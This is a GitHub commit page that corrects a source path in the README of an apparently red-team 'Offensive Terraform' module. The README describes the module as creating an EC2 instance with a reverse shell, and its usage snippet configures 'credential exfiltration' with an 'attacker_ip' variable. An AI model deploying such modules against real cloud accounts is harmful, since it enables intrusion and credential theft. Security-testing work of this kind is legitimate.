Skip to content

Commit

Permalink
Fix usage source path
Browse files Browse the repository at this point in the history
  • Loading branch information
iganbold committed Sep 6, 2020
1 parent cfc1251 commit 1a8cb20
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@ Offensive Terraform module which creates EC2 instance and reverse shell from an
## Usage
```
module "ec2_instance_credential_exfiltration" {
source = "offensive-terraform/ec2-instance-credential-exfiltration/aws"
source = "offensive-terraform/ec2-instance-reverse-shell/aws"
subnet_id = "subnet-0a4a1cc04"
attacker_ip = "0.0.0.0"
Expand Down

0 comments on commit 1a8cb20

Please # to comment.